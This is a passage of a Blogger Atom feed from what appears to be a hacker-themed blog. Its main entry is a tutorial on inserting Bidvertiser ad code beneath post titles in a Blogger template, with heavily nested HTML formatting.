magenta;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;b&gt;Greetz: Dr.Zombie from Madleets Security team and SecurityGeeks&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;h3 style=&quot;text-align: center;&quot;&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;br /&gt;&lt;h3 style=&quot;text-align: left;&quot;&gt;&lt;/h3&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/7260436351569797798/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/03/install-backtrack-in-android-device.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/7260436351569797798'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/7260436351569797798'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/03/install-backtrack-in-android-device.html' title='Install Backtrack In Android Device full guide'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-ofIEkDS1T7U/UoGaQfdRvuI/AAAAAAAAAM8/hJsEBcimXJk/s72-c/images.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-3845772884239079196</id><published>2013-03-27T21:19:00.001+05:00</published><updated>2013-11-12T07:53:31.339+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="blogger seo"/><category scheme="http://www.blogger.com/atom/ns#" term="blogging"/><title type='text'>Add bidvertiser ads under Blogger&#39;s post title (Blogspot)</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://t1.gstatic.com/images?q=tbn:ANd9GcRmECi-DDTS2H-OxeYnAzM1t9M_pxmUevAf2hHmPeORlxRfx1cLXg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://t1.gstatic.com/images?q=tbn:ANd9GcRmECi-DDTS2H-OxeYnAzM1t9M_pxmUevAf2hHmPeORlxRfx1cLXg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Well many of my fri&lt;span style=&quot;font-size: large;&quot;&gt;end &lt;span style=&quot;font-size: large;&quot;&gt;asking me about &lt;span style=&quot;font-size: large;&quot;&gt;how to ad bidvertiser ads under post title&lt;span style=&quot;font-size: large;&quot;&gt;, mean they got some articles &lt;span style=&quot;font-size: large;&quot;&gt;by searching on google but &lt;span style=&quot;font-size: large;&quot;&gt;failed. So i dec&lt;span style=&quot;font-size: large;&quot;&gt;ided to make this time&lt;span style=&quot;font-size: large;&quot;&gt;, hope this will help you.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Lets Get started:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;b&gt;1) ok &lt;span style=&quot;font-size: large;&quot;&gt;first ma&lt;span style=&quot;font-size: large;&quot;&gt;ke sure that you have bidvertise&lt;span style=&quot;font-size: large;&quot;&gt;r ac&lt;span style=&quot;font-size: large;&quot;&gt;count&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt; &lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;login there a&lt;span style=&quot;font-size: large;&quot;&gt;nd&lt;/span&gt; get the ad&lt;span style=&quot;font-size: large;&quot;&gt;&#39;s&lt;/span&gt; code you wish to show&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;2)Now goto you&lt;span style=&quot;font-size: large;&quot;&gt;r blogger template editing &lt;span style=&quot;font-size: large;&quot;&gt;and make sure Expand widgets check box is che&lt;span style=&quot;font-size: large;&quot;&gt;cked.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;3) &lt;span style=&quot;font-size: large;&quot;&gt;Press ctrl+f and search for this&lt;span style=&quot;font-size: large;&quot;&gt; code&lt;span style=&quot;font-size: large;&quot;&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #242424; color: #000222; font-family: Arial, Georgia, serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 22.390625px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;lt;b:if cond=&#39;data:blog.pageType == &amp;amp;quot;static_page&amp;amp;quot;&#39;&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;nbsp;&amp;lt;data:post.body/&amp;gt;&amp;lt;/b:if&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;4)&amp;nbsp;And from here real ga&lt;span style=&quot;font-size: large;&quot;&gt;me start&lt;span style=&quot;font-size: large;&quot;&gt;s. Be carefu&lt;span style=&quot;font-size: large;&quot;&gt;ll now a&lt;span style=&quot;font-size: large;&quot;&gt;bove &lt;span style=&quot;font-size: large;&quot;&gt;any of these two lines when you will paste th&lt;span style=&quot;font-size: large;&quot;&gt;e Bidvertise code You will get an erro&lt;span style=&quot;font-size: large;&quot;&gt;r&lt;span style=&quot;font-size: large;&quot;&gt;. That will be synatx error. For this f&lt;span style=&quot;font-size: large;&quot;&gt;irst you will need &lt;span style=&quot;font-size: large;&quot;&gt;to &lt;span style=&quot;font-size: large;&quot;&gt;encode you &lt;span style=&quot;font-size: large;&quot;&gt;Bidvertiser&lt;span style=&quot;font-size: large;&quot;&gt; &lt;span style=&quot;font-size: large;&quot;&gt;HTML code.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;To encode &lt;span style=&quot;font-size: large;&quot;&gt;your bidver&lt;span style=&quot;font-size: large;&quot;&gt;tiser code click the link below:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.opinionatedgeek.com/DotNet/Tools/HTMLEncode/encode.aspx&quot; target=&quot;_blank&quot;&gt;Click Here&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-BzUyc7cc3jU/UVMbPe6CheI/AAAAAAAAAIg/lqkpEvto4dw/s1600/Capture.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;213&quot; src=&quot;http://1.bp.blogspot.com/-BzUyc7cc3jU/UVMbPe6CheI/AAAAAAAAAIg/lqkpEvto4dw/s320/Capture.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;(Above pic show&lt;span style=&quot;font-size: large;&quot;&gt;s &lt;span style=&quot;font-size: large;&quot;&gt;you how to &lt;span style=&quot;font-size: large;&quot;&gt;e&lt;span style=&quot;font-size: large;&quot;&gt;nc&lt;span style=&quot;font-size: large;&quot;&gt;ode after going there)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;after encoding you will get &lt;span style=&quot;font-size: large;&quot;&gt;that code something like this:&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&amp;amp;lt;!-- Begin BidVertiser code --&amp;amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;amp;lt;SCRIPT LANGUAGE=&amp;amp;quot;JavaScript1.1&amp;amp;quot; SRC=&amp;amp;quot;http://bdv.bidvertiser.com/BidVertiser.dbm?pid=521758&amp;amp;amp;bid=1303342&amp;amp;quot; type=&amp;amp;quot;text/javascript&amp;amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;amp;lt;noscript&amp;amp;gt;&amp;amp;lt;a href=&amp;amp;quot;http://www.bidvertiser.com/bdv/BidVertiser/bdv_publisher_toolbar_creator.dbm&amp;amp;quot;&amp;amp;gt;toolbar maker&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/noscript&amp;amp;gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;amp;lt;!-- End BidVertiser code --&amp;amp;gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Ok Now paste this code below &lt;span style=&quot;font-size: large;&quot;&gt;any of those above lines you have searc&lt;span style=&quot;font-size: large;&quot;&gt;hed.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;lt;b:if cond=&#39;data:blog.pageType == &amp;amp;quot;static_page&amp;amp;quot;&#39;&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;nbsp;&amp;lt;data:post.body/&amp;gt;&amp;lt;/b:if&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp; &lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;above any of these line.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: 